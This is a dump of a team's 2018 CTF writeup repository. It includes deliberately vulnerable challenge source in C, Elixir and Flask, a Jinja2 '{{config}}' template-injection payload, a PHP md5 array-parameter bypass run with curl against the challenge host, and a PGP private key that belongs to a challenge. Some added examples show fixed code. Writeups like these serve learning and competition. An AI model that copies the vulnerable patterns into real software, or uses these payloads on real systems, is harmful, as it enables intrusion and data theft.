    puts("We recently heard that China wants to ban the letter N. Why not all uppercase?");
    puts("Let's not make it super hard, though: you have 100 tries. Do you know your maths and probabilities?");
    puts("Use the magic number above and give me the password. But no uppercase please!");

    int i;
    for(i = 0 ; i < 100; i++){
        char *p = gen_rand_string(100);
        chance(p);
        free(p);
    }
}

--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Pwnescu/rand:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/Pwn/Pwnescu/rand

--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/Pwnescu/rand.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* same generator as pwnescu.c: with the disclosed seed it reproduces the server's strings */
char *gen_rand_string(int len)
{
    int i;
    char buf[4096];
    char tab[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ";
    for(i = 0 ; i < len; i ++){
        char c = tab[rand() % (sizeof(tab)-1) ];
        buf[i] = c;
    }
    buf[len] = 0;

    char *s = calloc(len+1, 1);
    memcpy(s, buf, len+1);
    return s;
}

/* 1 if the first sz characters contain no uppercase letter, 0 otherwise */
int validate(char *buf, int sz){
    int i;
    for(i = 0 ; i < sz; i++)
        if ( buf[i] >= 'A' && buf[i] <= 'Z') return(0);
    return(1);
}


int main(int argc,char **argv)
{

    long int seed;
    int i;
    if (argc < 2) {
        fprintf(stderr, "usage: %s <hex seed>\n", argv[0]);
        return 1;
    }
    seed=strtol(argv[1],NULL,16);
    srand(seed);
    for(i = 0 ; i < 100; i++){
        char *p = gen_rand_string(100);
        if (validate(p,10))
            printf("%s\n",p);
        else
            printf("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n");
        free(p);
    }
}

--------------------------------------------------------------------------------
/2018/Timisoara/Pwn/README.md:
--------------------------------------------------------------------------------
---
layout: post
title: "Timisoara"
date: 20 Avril 2018
comments: true
categories: wu
auteur: françois
---

Writeups for the following 6 pwns:

Attendance Cdparty HeapSchool Letssort Memo Pwnescu

--------------------------------------------------------------------------------
/2018/Timisoara/forensic/neurosurgery/files/Ubuntu1604_4.4.0-116.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/forensic/neurosurgery/files/Ubuntu1604_4.4.0-116.zip

--------------------------------------------------------------------------------
/2018/Timisoara/forensic/neurosurgery/files/ht0p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/Timisoara/forensic/neurosurgery/files/ht0p

--------------------------------------------------------------------------------
/2018/Timisoara/web/porcupiney/README.md:
--------------------------------------------------------------------------------
# CTF - 2018 - Timisoara CTF 2018 Quals / Web / porcupiney

## web - 50 pts - SSL certificate

- We got an HTML website with nothing interesting on it.

- When we look at the subject alternative names of the certificate, we find a hidden one:
```
true | openssl s_client -connect porcupiney.woodlandhighschool.xyz:443 | openssl x509 -noout -text | grep DNS
depth=2 O = Digital Signature Trust Co., CN = DST Root CA X3
verify return:1
depth=1 C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X3
verify return:1
depth=0 CN = porcupiney.woodlandhighschool.xyz
verify return:1
DONE
DNS:nonononono.woodlandhighschool.xyz, DNS:porcupiney.woodlandhighschool.xyz
```

- When we navigate to it, the flag is in the page:
```
curl -s https://nonononono.woodlandhighschool.xyz | grep timctf
Look away! Shush! I give you flag, you shush, ok? timctf{w00dl4nd_cr1tt3rs_s3cur3_chr1stm4s}
```

- Demo here: [![asciicast](https://asciinema.org/a/PC9bywxGJb1gYi4JtItgLIXy0.png)](https://asciinema.org/a/PC9bywxGJb1gYi4JtItgLIXy0?speed=2)

By team Beers4Flags

```
 ________
|        |
|  #BFF  |
|________|
 _.._,_|,_
(   |    )
]~,"-.-~~[
.=]  Beers ([
|  ])  4  ([
'=]) Flags [
 |::     ' |
  ~~----~~
```

--------------------------------------------------------------------------------
/2018/angstrom/README.md:
--------------------------------------------------------------------------------
# Angstrom CTF 2018 WU

--------------------------------------------------------------------------------
/2018/angstrom/crypto/ssh/files/id_rsa:
--------------------------------------------------------------------------------
[partially redacted RSA private key block omitted]

--------------------------------------------------------------------------------
/2018/angstrom/crypto/ssh/files/id_rsa.pub:
--------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+XZWLCbIpHPC9NlEckVXiKfiujcyu4VUslmm4G1MqNjtPNHaUEoZ8z5LLQK3e9SAKBdze8JyNowmC+lQT2VL059s9pzlRn6t31XTeUjZslgOs6IfAy/MsUkfOwUIo6KcqpSVnmeVMQPOiLUZCza9eDdB3MxFY59hNuodW1TGku00ro+ecKZcvJ+uNC/nfgeLpzaI7Dd6tI8AKrr+g9Tgyd6Ihd3KanLXuWMRwGbbLMi1/uaQd86LVYt/SAvkGO15eUELP723c/kEjKGfhwSKo3MGM5R77uMxfm8DzKW8QkcowEO2FEnPUykBnV1PaiWrl/PoBWTp8hNUYxQPAruWB

--------------------------------------------------------------------------------
/2018/angstrom/crypto/ssh/files/privkey.pem:
--------------------------------------------------------------------------------
[RSA private key block omitted]

--------------------------------------------------------------------------------
/2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/config/config.exs:
--------------------------------------------------------------------------------
# This file is responsible for configuring your application
# and its dependencies with the aid of the Mix.Config module.
use Mix.Config

# This configuration is loaded before any dependency and is restricted
# to this project. If another project depends on this project, this
# file won't be loaded nor affect the parent project. For this reason,
# if you want to provide default values for your application for
# 3rd-party users, it should be done in your "mix.exs" file.

# You can configure your application as:
#
#     config :pastepalooza, key: :value
#
# and access this configuration in your application as:
#
#     Application.get_env(:pastepalooza, :key)
#
# You can also configure a 3rd-party app:
#
#     config :logger, level: :info
#

# It is also possible to import configuration files, relative to this
# directory. For example, you can emulate configuration per environment
# by uncommenting the line below and defining dev.exs, test.exs and such.
# Configuration from the imported file will override the ones defined
# here (which is why it is important to import them last).
#
#     import_config "#{Mix.env}.exs"

--------------------------------------------------------------------------------
/2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/lib/pastepalooza.ex:
--------------------------------------------------------------------------------
defmodule PastePalooza do
  require Logger

  def accept(port) do
    {:ok, socket} = :gen_tcp.listen(port, [:binary, packet: :line, active: false, reuseaddr: true])
    Logger.info "Accepting connections on port #{port}"
    loop_acceptor(socket)
  end

  defp loop_acceptor(socket) do
    {:ok, client} = :gen_tcp.accept(socket)
    serve(client)
    loop_acceptor(socket)
  end

  defp serve(socket) do
    write_line(socket, "Welcome to Paste Palooza!\n")
    write_line(socket, "Currently, only the file access feature is available.\n")
    write_line(socket, "Access a file by entering its name: ")
    {:ok, filename} = read_line(socket)
    response = Utility.access(filename)
    write_line(socket, response)
    :gen_tcp.close(socket)
  end

  defp read_line(socket) do
    :gen_tcp.recv(socket, 0)
  end

  defp write_line(socket, text) do
    :gen_tcp.send(socket, text)
  end
end

--------------------------------------------------------------------------------
/2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/lib/server.ex:
--------------------------------------------------------------------------------
defmodule Server do
  use Application

  def start(_type, _args) do
    children = [
      {Task.Supervisor, name: PastePalooza.TaskSupervisor},
      Supervisor.child_spec({Task, fn -> PastePalooza.accept(3001) end}, restart: :permanent)
    ]

    opts = [strategy: :one_for_one, name: PastePalooza.Supervisor]
    Supervisor.start_link(children, opts)
  end
end

--------------------------------------------------------------------------------
/2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/lib/utility.ex:
--------------------------------------------------------------------------------
defmodule Utility do

  def access(filename) do
    unsafe = "pastes/" <> filename <> ".txt"
    path = filter(unsafe <> <<0>>, "", String.length(unsafe))
    case File.read path do
      {:ok, content} -> content
      {:error, _reason} -> "File not found.\n"
    end
  end

  # keeps only printable ASCII (33..126), consuming at most n bytes of input
  def filter(<< head, tail :: binary >>, acc, n) do
    if n == 0 do
      acc
    else
      n = n - 1
      if head < 33 or head > 126 do
        filter(tail, acc, n)
      else
        filter(tail, acc <> <<head>>, n)
      end
    end
  end
end

--------------------------------------------------------------------------------
/2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/mix.exs:
--------------------------------------------------------------------------------
defmodule PastePalooza.Mixfile do
  use Mix.Project

  def project do
    [
      app: :pastepalooza,
      version: "0.1.0",
      elixir: "~> 1.5",
      start_permanent: Mix.env == :prod,
      deps: deps(),
      flag: "REDACTED"
    ]
  end

  # Run "mix help compile.app" to learn about applications.
  def application do
    [
      extra_applications: [:logger],
      mod: {Server, []}
    ]
  end

  # Run "mix help deps" to learn about dependencies.
  defp deps do
    [
      # {:dep_from_hexpm, "~> 0.3.0"},
      # {:dep_from_git, git: "https://github.com/elixir-lang/my_dep.git", tag: "0.1.0"},
    ]
  end
end

--------------------------------------------------------------------------------
/2018/angstrom/misc/paste_palooza/src/pastepalooza/redacted/pastes/paste.txt:
--------------------------------------------------------------------------------
paste palooza!

--------------------------------------------------------------------------------
/2018/angstrom/web/madlibs/README.md:
--------------------------------------------------------------------------------
# Angstrom - CTF writeup - MADLIBS - 120 pts

- We end up on a web page in which we can enter data according to a template.
![img/screen1.png](img/screen1.png)

- We fill in the data and get it formatted in a template.
![img/screen2.png](img/screen2.png)

- The application's source code is made available: [app.py](src/app.py)
- We obviously see what interests us:
```python
app.secret_key = open("flag.txt").read()
```

- We look into template injection by sending `{{2-1}}` in every available field. We then get it interpreted in the author field:
![img/screen3.png](img/screen3.png)

- So it is template injection; the problem is the limit on the number of characters:
```python
authorName = inpValues.pop(0)[:12]
```

- If we exclude the `{{}}` we only have 8 chars left for our injection.
- In the end, after some research on template injection, we come across this source: https://nvisium.com/resources/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html

- So we pass `{{config}}` as the author value and get:
![img/screen4.png](img/screen4.png)

- flag: `actf{wow_ur_a_jinja_ninja}`

By team Beers4Flags

```
 ________
|        |
|  #BFF  |
|________|
 _.._,_|,_
(   |    )
]~,"-.-~~[
.=]  Beers ([
|  ])  4  ([
'=]) Flags [
 |::     ' |
  ~~----~~
```

--------------------------------------------------------------------------------
/2018/angstrom/web/madlibs/img/screen1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/angstrom/web/madlibs/img/screen1.png

--------------------------------------------------------------------------------
/2018/angstrom/web/madlibs/img/screen2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/angstrom/web/madlibs/img/screen2.png

--------------------------------------------------------------------------------
/2018/angstrom/web/madlibs/img/screen3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/angstrom/web/madlibs/img/screen3.png

--------------------------------------------------------------------------------
/2018/angstrom/web/madlibs/img/screen4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/angstrom/web/madlibs/img/screen4.png
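The madlibs bug pattern next to its fixed form, as an added example that is not part of the writeup or of the challenge's app.py: it assumes jinja2 is installed, and stands in for Flask's automatic `config` template variable with a constructed dict holding a placeholder secret (the real flag never appears).

```python
# Added example (not the challenge's app.py, not the writeup's code).
# Shows why the madlibs author field is injectable and what the fix looks like,
# using a plain jinja2 Environment. Flask injects `config` into every template
# context; here that is simulated with a constructed dict and a placeholder secret.
from jinja2 import Environment

env = Environment(autoescape=True)

# constructed stand-in for Flask's app.config (app.secret_key = open("flag.txt").read())
FAKE_CONFIG = {"SECRET_KEY": "PLACEHOLDER_SECRET_KEY"}

AUTHOR_MAX = 12  # app.py truncates authorName with [:12]

COMMENT_TEMPLATE = (
    "This MadLib with title {{ title }} was created by {{ author }} at {{ when }}"
)


def vulnerable_comment(title, author, when):
    """Mirror of app.py: user data is %-formatted into the *template source* before
    rendering, so whatever survives the 12-char cut is parsed as Jinja code."""
    author = author[:AUTHOR_MAX]
    source = "This MadLib with title %s was created by %s at %s" % (title, author, when)
    return env.from_string(source).render(config=FAKE_CONFIG)


def fixed_comment(title, author, when):
    """Hardened form: the template source is a constant and user data only enters
    as context variables, so {{ }} in the author field is plain (escaped) text."""
    author = author[:AUTHOR_MAX]
    return env.from_string(COMMENT_TEMPLATE).render(
        title=title, author=author, when=when, config=FAKE_CONFIG
    )


def looks_like_template_syntax(value):
    """Detection helper for request logs: Jinja expression/statement/comment delimiters."""
    return any(marker in value for marker in ("{{", "{%", "{#"))


if __name__ == "__main__":
    probe = "{{config}}"  # 10 characters: fits the 12-char author limit
    print("vulnerable:", vulnerable_comment("A Random Story", probe, "2018-03-20 00:00:00"))
    print("fixed:     ", fixed_comment("A Random Story", probe, "2018-03-20 00:00:00"))
```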
-------------------------------------------------------------------------------- /2018/angstrom/web/madlibs/src/app.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, render_template, render_template_string, send_from_directory, request 2 | from jinja2 import Environment, FileSystemLoader 3 | from time import gmtime, strftime 4 | template_dir = './templates' 5 | env = Environment(loader=FileSystemLoader(template_dir)) 6 | 7 | 8 | madlib_names = ["The Tale of a Person","A Random Story"] 9 | story_fields = { 10 | "The Tale of a Person":['Author Name','Adjective','Noun','Verb'], 11 | "A Random Story":['Author Name','Adjective','Noun','Any first name','Verb'] 12 | } 13 | 14 | app = Flask(__name__) 15 | app.secret_key = open("flag.txt").read() 16 | 17 | @app.route("/",methods=["GET"]) 18 | def home(): 19 | return render_template("home.html",libs=madlib_names) 20 | 21 | @app.route("/form/",methods=["GET"]) 22 | def madlib(templatename): 23 | global madlib_names 24 | if templatename in madlib_names: 25 | return render_template("home.html",libs=madlib_names,title=templatename,fields=story_fields[templatename]) 26 | else: 27 | error_message = 'The MadLib with title "' + templatename + '" could not be found.' 28 | return render_template("home.html",libs=madlib_names,message=error_message) 29 | 30 | @app.route("/result/",methods=["POST"]) 31 | def output(templatename): 32 | 33 | if templatename not in madlib_names: 34 | return "Template not found." 
35 | 36 | inpValues = [] 37 | for i in range(len(story_fields[templatename])): 38 | if not request.form[str(i+1)]: 39 | return "All form fields must be filled" 40 | else: 41 | inpValues.append(request.form[str(i+1)][:24]) 42 | 43 | authorName = inpValues.pop(0)[:12] 44 | try: 45 | comment = render_template_string('''This MadLib with title %s was created by %s at %s''' % (templatename, authorName, strftime("%Y-%m-%d %H:%M:%S", gmtime()))) 46 | except: 47 | comment = "Error generating comment." 48 | return render_template("_".join(templatename.lower().split())+".html",libtitle=templatename,footer=comment, libentries=inpValues) 49 | 50 | 51 | @app.route("/get-source", methods=["GET","POST"]) 52 | def source(): 53 | return send_from_directory('./','app.py') 54 | 55 | if __name__ == "__main__": 56 | app.run(host='0.0.0.0', port=7777, threaded=True) 57 | -------------------------------------------------------------------------------- /2018/angstrom/web/md5/readme.md: -------------------------------------------------------------------------------- 1 | # Angstrom - CTF writeup - MD5 - 140 pts 2 | 3 | - Le chall consiste en un formulaire qui doit comparer deux string qui une fois hashé en md5 doivent donner la même valeur : 4 | 5 | ![web-md5-screen.png](web-md5-screen.png) 6 | 7 | - On peut voir dans les sources le code php suivant : 8 | ```php 9 | 21 | ``` 22 | 23 | - On constate qu'il n'y a que des comparaisons strictes, en `===` ou `!==` 24 | - Le salt est le même des deux cotés : `hash("md5", $salt . $_GET["str1"]) === hash("md5", $salt . 
$_GET["str2"]))`
- So we need to make str1 equal to str2 while still bypassing the check: `$_GET["str1"] !== $_GET["str2"]`
- To do that we use PHP arrays, because an array concatenated with a string produces the string 'Array':
```php
php > $a = array('str1');
php > $b = 'salt'.$a;
PHP Notice:  Array to string conversion in php shell code on line 1
php > var_dump($b);
string(9) "saltArray"
```

- So by passing two different arrays as parameters, they produce the same string once concatenated with the salt, while still passing the parameter inequality check.

- Result: `http://web.angstromctf.com:3003/?str1[]=a&str2[]=b`
```
➜  ~ curl "http://web.angstromctf.com:3003/\?str1\[\]\=a\&str2\[\]\=b"
actf{but_md5_has_charm}
```

By team Beers4Flags

```
   ________
  |        |
  |  #BFF  |
  |________|
  _.._,_|,_
 (    |     )
  ]~,"-.-~~[
 .=]  Beers ([
 | ])   4   ([
 '=]) Flags  [
  |::   '   |
   ~~----~~
```
--------------------------------------------------------------------------------
/2018/angstrom/web/md5/web-md5-screen.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/angstrom/web/md5/web-md5-screen.png
--------------------------------------------------------------------------------
/2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter01.png
--------------------------------------------------------------------------------
/2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter02.png
--------------------------------------------------------------------------------
/2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/bsides/forensic/fuzzy/files/fuzzy_dns_filter03.png
--------------------------------------------------------------------------------
/2018/bsides/forensic/fuzzy/files/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/bsides/forensic/fuzzy/files/img.png
--------------------------------------------------------------------------------
/2018/bsides/forensic/fuzzy/files/message.gpg:
--------------------------------------------------------------------------------
-----BEGIN PGP MESSAGE-----
Version: OpenPGP v2.0.8
Comment: https://sela.io/pgp/

wcBMA8fXP+32fyviAQf/T+NzsOgQ+ejW16GeK6h9WS9IDelAN9GLY5x5o9ilBlEL
G4IPati4/zqd+kyV5mmA7k2eKnNByRnxElpp0PoGULX0ykjBTcXuLtNXzGWcDsFF
xAkH8PduoPCcnNGWrCU6D8ZuWNtp7oeZ1krUZP+Kg9sfjjKfx0aUFhWs9SQH6mif
AlbJQwxKi2xXv0UsHvg4Mz4TpVstoO5XcN9d4V+gygc+wx0K61JwAFw96xptNi9y
hdMz/c7yW56JwBfwyiHvYmgLdWYJW9OEoQIj7Rwh1v8mD846vbvEDmagQ0Ra/K6q
lnxa37gBFE+4kYpSXP7yqr8QMhmGDpMROJoJqxYyY9JxAe6317HZ+UUEOmNR+0tB
EmPl/VVaoPc5q6RQ/cxwY4VhR4DtPsG9Gw237Sx+xSTAG5JbmtBf4KfQdVbeaXn1
PYPYBeCVL6nb6uPz6ZHBJ2SODWg9+Ssas+Gd5P7Q0zSA/35qYdamnAqUM/ujM2nN
k2U=
=+x+V
-----END PGP MESSAGE-----
--------------------------------------------------------------------------------
/2018/bsides/forensic/fuzzy/files/private.gpg:
--------------------------------------------------------------------------------
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG C# v1.6.1.0

lQOsBFvO/9wBCACgT4fK4dJm+M14jotXPUeKueo8xfFDunNUx/ZaSQbp5Y0i64OZ
dPkQk4E2zCgXaYKNRhiIx2RUy27GBf7xjtDb0gh/HNhC41f5ZzYrNQBEcabcr0hn
VfwiEzAqmTg+5TNsG26ZD2kuO1/J5zbKxI1D3g/9//fe5Nw8GucDiOntKgvFEXeV
ETZ0llbP/mh8SAn5+naJiJJri9y3GF+QhX7wYP+W6mBkano8X/Yk2B2qWIRT6wRU
DMQy1ptavyv5EJhYbsQGeAMu7WPJN+mLutAE2E1Xj03Sevsx2ynN8b/jF/HYp/mZ
SzZ+TbHlRUoMC4+hYh5XfXy7Cx9HSI0uIDShABEBAAH/AwMCEv0ZoXbeXxxg3ioH
/Y0lUhYOormsNzbrBjl1ipyWTDmRAf9BhmAPrX9K5GPAFAurGOj8QOQEWGrOyXfk
gYtHXzGk1K6ItCitgxdBqHgbti23Ht8SmVWw3/pijPXXerXXMqj6NQ95ma6bYPsU
PRtE1qtiEs+T8ln6ZBU9BCNyuZDceBY6btZS0cp88wB1xEPorhXVtjiV1cjDRSFG
licqXh4fr4Qe0TUEeZK1uTqlhdj6YvKoFP94OKGxeM0eR1R/H/zyOtJVMMsEZLGr
GNSVBZBN0B6l9wAMa+DGpuHIX25I197vP3x0v0gvP/57bF9og9mj2JzntM9NJsR1
2zAgplgX4IUp4SGPvcNbLE5c9yIEj77SAOBumrF3IcUYNN9IXvIHQh8qzOWmI5q+
NFCKin0tQNCAx4ef+4ThkyPezRovlFxG6T4HMF1YjYrlVMgiN034opaCKoFXd3EF
4UufN3vV0IYB7AfxWLeNAJyPCreDSyYyLFGx+ONpM5JKk/1cwH8H0XQuLXY+TuGj
iF6QWkRkVcAYv0F7r2wPaVOVa8465s34fY94Rv1+KCpsjNFc3FrAJhz84jETxxqr
s44U/zmGh0/tixjs9vB1C/i7csYWXYJYiPsPmcp5sOE4M1PtYsIfuOlaJ12e/IV9
YnNK+RLghYQ0MghUMHZeg8aqKY7SATDB1SuK+YKmhXte/E/VhTBUy+3RautMIUwS
w9R1z2Hh4POZ4kp8yj9PnEujoQ5XtZuruhNyiWEwWYf1GPuDSoeEYcIRj18h8dL+
OSvsS1DqgPxH9hy8iidLDq1ZkrQ0w08Du9zjVY02f4OoRunzXbis6P3Y0mRf4iif
bYdqVg3snMwY5u9lEaIYqmtcGibgybah394CgTt0xrQTa2FydGlrOTk3QGdtYWls
LmNvbYkBHAQQAQIABgUCW87/3AAKCRDH1z/t9n8r4qnlB/9N1BBWSf6lfmejPh3R
DZ+QrBsCELm8qBeawlsY9To6UUdrIoC9vzIwKAgil2K2MC9z/laZQcep0WepnOar
5KSUyhPI50/aE97yfA0v4lKkylb0OPt8E0S4gIxTlRhpht2K4lsRaD+2wyRvMRuU
/Grgxd5TVVm9KfXQBCAxgFgX2OdZ2/Yb2GJQ4M6DquISIBar+i39a9bdZ9kP70ox
jfgG8SLXPxzBiHIULUy4X+80VafKWw1/AzN2t4CTRtIMHu7jeUqpws+MB6TxTLBA
G/JSdb+W3ceHseJ9YXqVIhfrlKt8T3QAqErjQjPN0YB9KDaELwDM1rxFryy8zuAB
zdZ/
=rb5z
-----END PGP PRIVATE KEY BLOCK-----
--------------------------------------------------------------------------------
/2018/codegate/reverse/RedVelvet/README.md:
--------------------------------------------------------------------------------
---
layout: post
title: CodegateCTF
date: 3 Février 2018
comments: true
categories: wu
auteur: jambon69
---

## RedVelvet

The binary is not stripped, so the basic reversing is fairly easy.

We are faced with 15 functions that perform operations on the different characters of the flag.
Conditions mean z3, so we bring out Microsoft's good old solver.

At the end we have 4 flags that satisfy the conditions; we try them all.

The right one turns out to be `What_You_Wanna_Be?:)_la_la`

Here I used one BitVec per character, since the code uses bitwise operations, which z3's Int does not support. It is a bit dirty, but it gets the job done.
--------------------------------------------------------------------------------
/2018/codegate/reverse/RedVelvet/RedVelvet:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2018/codegate/reverse/RedVelvet/RedVelvet
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# writeups

Beers4Flags WU

### For members:

File organization
```
CTFNAME-DATE
-- categorie
---- challenge name
------README.md
------Others files
```
--------------------------------------------------------------------------------
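The angstrom "md5" writeup above relies on PHP turning any array into the literal string "Array" when it is concatenated, so two different arrays pass a strict `!==` check and still hash to the same salted digest. The following is an added example, not code from the Beers4Flags repository or from the challenge itself: the challenge's real source is not fully visible on this page, so the vulnerable function is an assumed reconstruction of the pattern the writeup describes, and `SALT` is a placeholder. It shows that weak check beside a hardened version that rejects non-string parameters before hashing.

```php
<?php
// Added example for the angstrom "md5" writeup; not code from the challenge
// or the Beers4Flags repository. vulnerableCheck() is an ASSUMED
// reconstruction of the pattern the writeup describes: a strict inequality
// check on the two parameters, then a comparison of salted MD5 digests.

const SALT = 'salt'; // placeholder: the challenge's real salt is not on the page

// Vulnerable form. ['a'] !== ['b'] is true, so two distinct arrays get past
// the inequality guard, yet SALT . ['a'] and SALT . ['b'] both become
// "saltArray" (PHP converts an array to the string "Array" and only raises a
// notice/warning), so the two digests are identical and the check succeeds.
function vulnerableCheck(array $get): bool
{
    if (!isset($get['str1'], $get['str2'])) {
        return false;
    }
    if ($get['str1'] === $get['str2']) {   // the original !== guard, inverted
        return false;
    }
    return md5(SALT . $get['str1']) === md5(SALT . $get['str2']);
}

// Hardened form. Query parameters may arrive as arrays (?str1[]=a), so the
// type is checked before the value is ever hashed. hash_equals() keeps the
// digest comparison constant-time, a separate concern from the array issue.
function hardenedCheck(array $get): bool
{
    if (!isset($get['str1'], $get['str2'])) {
        return false;
    }
    if (!is_string($get['str1']) || !is_string($get['str2'])) {
        return false;                      // arrays and other types are rejected
    }
    if ($get['str1'] === $get['str2']) {
        return false;
    }
    return hash_equals(md5(SALT . $get['str1']), md5(SALT . $get['str2']));
}

// Constructed sample input: what PHP builds in $_GET for ?str1[]=a&str2[]=b.
$arrayInput = ['str1' => ['a'], 'str2' => ['b']];
// Constructed sample input: an ordinary request with two distinct strings.
$stringInput = ['str1' => 'a', 'str2' => 'b'];

var_dump(vulnerableCheck($arrayInput));  // the array trick satisfies the weak check
var_dump(hardenedCheck($arrayInput));    // rejected by the is_string() guard
var_dump(hardenedCheck($stringInput));   // two real strings, two different digests
```

Run it with `php example.php`: the first call reports true and the other two false. On the operations side, the same signal that makes the trick work is what to alert on: bracketed query parameters (`str1[]=`) sent to an endpoint that is documented to take scalars, together with the "Array to string conversion" notice in the PHP error log.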
